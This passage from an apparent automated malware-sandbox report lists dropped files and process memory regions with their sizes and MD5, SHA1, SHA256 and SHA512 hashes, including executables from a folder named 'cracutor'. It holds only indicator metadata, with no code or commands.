                      831ba87cb1a91d4581f0abbcc4966c6f4b332536f70cf481f609c44cc3d987c2

                      SHA512

                      33b1fd3a289193bff168c967caebc0131732bd04562a770cf2edac602ab6d958f7bde7a0e57bb125a7598852bdac30f96d0db46cb4a2460a61a0d914b011ed20

                    • C:\Users\Admin\AppData\Local\Temp\_MEI4202\unicodedata.pyd
                      Filesize

                      1.1MB

                      MD5

                      a40ff441b1b612b3b9f30f28fa3c680d

                      SHA1

                      42a309992bdbb68004e2b6b60b450e964276a8fc

                      SHA256

                      9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08

                      SHA512

                      5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyw11z0b.zlc.ps1
                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
                      Filesize

                      2.0MB

                      MD5

                      03d0c69e31fd77718e661722361c0a5c

                      SHA1

                      04e02539771963a628477f6546be48d2d912a612

                      SHA256

                      255834540df95d84167a197acc6e70d9b80baa5dc15ddb16060508be498f1e78

                      SHA512

                      94ed7ee2ad72a4b80fc9121483c5b95ad2a1036b3a20f60499d59cc1255635bcade467952b828a3b27415ddd799c8b3a89476bc0f34726292f6632249fa0d986

                    • C:\Users\Admin\AppData\Local\Temp\yxpisl.exe
                      Filesize

                      13.6MB

                      MD5

                      5076e1777bdc18710ed70c27b96a95db

                      SHA1

                      cb24ad63bd9598bccf46e64b576144b2e5be7d53

                      SHA256

                      73d2131cdc04f4751f9c6911607a76192bd5e440ec597291cba1acb1aba8f201

                      SHA512

                      8d931a5dc1e4cfd7e0876e6f35ba8a2756a44957f746b3c996d6753f089ef127557e483ff434aa2861ae12071a4a68c3eafcacd5930e5f1234fb91831cc67de9

                    • C:\Users\Admin\AppData\Local\Tempcrbydenhyt.db
                      Filesize

                      46KB

                      MD5

                      14ccc9293153deacbb9a20ee8f6ff1b7

                      SHA1

                      46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

                      SHA256

                      3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

                      SHA512

                      916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

                    • C:\Users\Admin\AppData\Local\Tempcrdpeddcov.db
                      Filesize

                      112KB

                      MD5

                      87210e9e528a4ddb09c6b671937c79c6

                      SHA1

                      3c75314714619f5b55e25769e0985d497f0062f2

                      SHA256

                      eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

                      SHA512

                      f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

                    • C:\Users\Admin\AppData\Local\Tempcrfrowwqeh.db
                      Filesize

                      20KB

                      MD5

                      42c395b8db48b6ce3d34c301d1eba9d5

                      SHA1

                      b7cfa3de344814bec105391663c0df4a74310996

                      SHA256

                      5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

                      SHA512

                      7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

                    • C:\Users\Admin\AppData\Local\Tempcrlcijrlxz.db
                      Filesize

                      46KB

                      MD5

                      8f5942354d3809f865f9767eddf51314

                      SHA1

                      20be11c0d42fc0cef53931ea9152b55082d1a11e

                      SHA256

                      776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

                      SHA512

                      fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

                    • C:\Users\Admin\AppData\Local\Tempcrozmrsnqv.db
                      Filesize

                      100KB

                      MD5

                      d342f631f89f021020358e47b573914c

                      SHA1

                      f8697ca97c30bb9e3b59b2b08c9e4bfb180eb1a1

                      SHA256

                      7583599132bb40f6176fc93f108c9e842e9f9ef94dcf2fcac1b1dad83a926cb2

                      SHA512

                      0e3360812dbe5ad0a942f1a380048f53ff868cbdecb4d55de26f16d50696839872d57ad6b9d83a685d2bd0a58f513817a3febe5d51878fbe91cf520c73f8a796

                    • C:\Users\Admin\AppData\Local\Tempcrtirocmbl.db
                      Filesize

                      152KB

                      MD5

                      73bd1e15afb04648c24593e8ba13e983

                      SHA1

                      4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

                      SHA256

                      aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

                      SHA512

                      6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

                    • memory/2232-11-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/2232-0-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp
                      Filesize

                      8KB

                    • memory/2232-93-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/2232-179-0x0000026FB5830000-0x0000026FB5B80000-memory.dmp
                      Filesize

                      3.3MB

                    • memory/2232-181-0x0000026FB5220000-0x0000026FB522E000-memory.dmp
                      Filesize

                      56KB

                    • memory/2232-91-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp
                      Filesize

                      8KB

                    • memory/2232-9-0x0000026FACB50000-0x0000026FACB72000-memory.dmp
                      Filesize

                      136KB

                    • memory/2232-10-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/2232-92-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/2232-17-0x0000026FACDA0000-0x0000026FACDB4000-memory.dmp
                      Filesize

                      80KB

                    • memory/2232-14-0x0000026FB4EA0000-0x0000026FB50A8000-memory.dmp
                      Filesize

                      2.0MB

                    • memory/2232-13-0x0000026FACB40000-0x0000026FACB48000-memory.dmp
                      Filesize

                      32KB

                    • memory/2232-12-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/2232-237-0x0000026FB5B80000-0x0000026FB5CA0000-memory.dmp
                      Filesize

                      1.1MB

                    • memory/4864-37-0x0000000005B50000-0x0000000005B5E000-memory.dmp
                      Filesize

                      56KB

                    • memory/4864-35-0x0000000005B30000-0x0000000005B38000-memory.dmp
                      Filesize

                      32KB

                    • memory/4864-34-0x0000000075230000-0x00000000759E1000-memory.dmp
                      Filesize

                      7.7MB

                    • memory/4864-28-0x000000007523E000-0x000000007523F000-memory.dmp
                      Filesize

                      4KB

                    • memory/4864-36-0x0000000006500000-0x0000000006538000-memory.dmp
                      Filesize

                      224KB

                    • memory/4864-32-0x00000000056E0000-0x000000000577E000-memory.dmp
                      Filesize

                      632KB

                    • memory/4864-29-0x0000000000770000-0x000000000096E000-memory.dmp
                      Filesize

                      2.0MB

                    • memory/4864-30-0x0000000075230000-0x00000000759E1000-memory.dmp
                      Filesize

                      7.7MB

                    • memory/4864-33-0x0000000006160000-0x00000000061F2000-memory.dmp
                      Filesize

                      584KB

                    • memory/4864-95-0x0000000075230000-0x00000000759E1000-memory.dmp
                      Filesize

                      7.7MB

                    • memory/4864-94-0x000000007523E000-0x000000007523F000-memory.dmp
                      Filesize

                      4KB

                    • memory/4864-31-0x0000000005BB0000-0x0000000006156000-memory.dmp
                      Filesize

                      5.6MB